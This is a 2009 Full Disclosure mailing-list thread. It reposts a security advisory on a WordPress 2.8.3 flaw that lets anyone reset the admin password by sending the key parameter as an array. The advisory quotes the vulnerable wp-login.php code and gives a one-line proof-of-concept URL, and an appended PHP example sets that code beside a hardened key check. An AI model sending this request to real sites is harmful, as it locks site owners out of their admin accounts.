Full Disclosure mailing list archives
Re: WordPress <= 2.8.3 Remote admin reset password
From: laurent gaffie <laurent.gaffie () gmail com>
Date: Mon, 10 Aug 2009 23:27:58 -0400
Well, I don't think so, that's why I published this. It's very limited. It's true, someone can make a loop script and avoid any possibility to log back on your WordPress blog, but you also can avoid that functionality easily, you just need to comment out 1 line. Anyways, a patch should come out soon.

Regards
Laurent Gaffié

2009/8/10 ehmo <diskusie () gmail com>
Very nice Laurent. That will hurt many ppl.

laurent wrote:

=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================

I. VULNERABILITY
-------------------------
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it.

III. DESCRIPTION
-------------------------
The way WordPress handles a password reset looks like this:

You submit your email address or username via this form /wp-login.php?action=lostpassword ; WordPress sends you a reset confirmation like that via email:

"Someone has asked to reset the password for the following site and username.

http://DOMAIN_NAME.TLD/wordpress

Username: admin

To reset your password visit the following address, otherwise just ignore this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag"

You click on the link, and then WordPress resets your admin password, and sends you over another email with your new credentials.

Let's see how it works:

wp-login.php:

...[snip]....
line 186:

function reset_password($key) {
	global $wpdb;

	$key = preg_replace('/[^a-z0-9]/i', '', $key);
	if ( empty( $key ) )
		return new WP_Error('invalid_key', __('Invalid key'));

	$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
	if ( empty( $user ) )
		return new WP_Error('invalid_key', __('Invalid key'));

...[snip]....
line 276:

$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
	$action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
	$action = 'login';

...[snip]....
line 370:

	break;

case 'resetpass' :
case 'rp' :
	$errors = reset_password($_GET['key']);

	if ( ! is_wp_error($errors) ) {
		wp_redirect('wp-login.php?checkemail=newpass');
		exit();
	}

	wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
	exit();
	break;

...[snip ]...

You can abuse the password reset function, and bypass the first step and then reset the admin password by submitting an array to the $key variable.

IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficient to reproduce this Proof of concept:

http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=

The password will be reset without any confirmation.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin account of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
-------------------------
All

VII. SOLUTION
-------------------------
No patch available for the moment.

VIII. REFERENCES
-------------------------
http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

I'd like to shoot some greetz to securityreason.com for their great research on PHP, as for this under-estimated vulnerability discovered by Maksymilian Arciemowicz: http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
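The key check quoted from reset_password() above, beside a hardened version, as an added example that is not part of this thread and is not WordPress's own patch; the function names and the sample inputs are constructed for illustration. It shows why preg_replace() plus empty() lets a key[]= array through, and how a type check stops it.

```php
<?php
// Added example (not WordPress code): the vulnerable key check from the
// advisory beside a hardened one. validate_reset_key_vulnerable() mirrors
// the first lines of reset_password() in wp-login.php 2.8.3; the hardened
// version is this editor's own, not the vendor patch.

function validate_reset_key_vulnerable($key) {
    // preg_replace() accepts an array subject and returns an array, and
    // empty() is false for any non-empty array, so array('') passes through.
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ( empty( $key ) )
        return false;           // WP_Error('invalid_key') in the original
    return $key;                // may be an array rather than a string
}

function validate_reset_key_hardened($key) {
    // Accept only a non-empty scalar string that survives sanitisation
    // unchanged; arrays, nulls and keys with stripped characters are invalid.
    if ( ! is_string( $key ) || $key === '' )
        return false;
    $clean = preg_replace('/[^a-z0-9]/i', '', $key);
    if ( $clean !== $key )
        return false;
    return $clean;
}

// Constructed inputs: the key format from the advisory's sample email, the
// key[]= array from the proof of concept, and an empty key.
$inputs = array(
    'valid key' => 'o7naCKN3OoeU2KJMMsag',
    'array key' => array(''),
    'empty key' => '',
);

foreach ( $inputs as $label => $input ) {
    $v = validate_reset_key_vulnerable($input);
    $h = validate_reset_key_hardened($input);
    printf("%-10s vulnerable=%-24s hardened=%s\n", $label,
        is_array($v) ? 'array (accepted!)' : var_export($v, true),
        var_export($h, true));
}
```

Only the array input separates the two checks: the vulnerable version returns an array that is then handed to the database query, while the hardened one rejects it before any query is built.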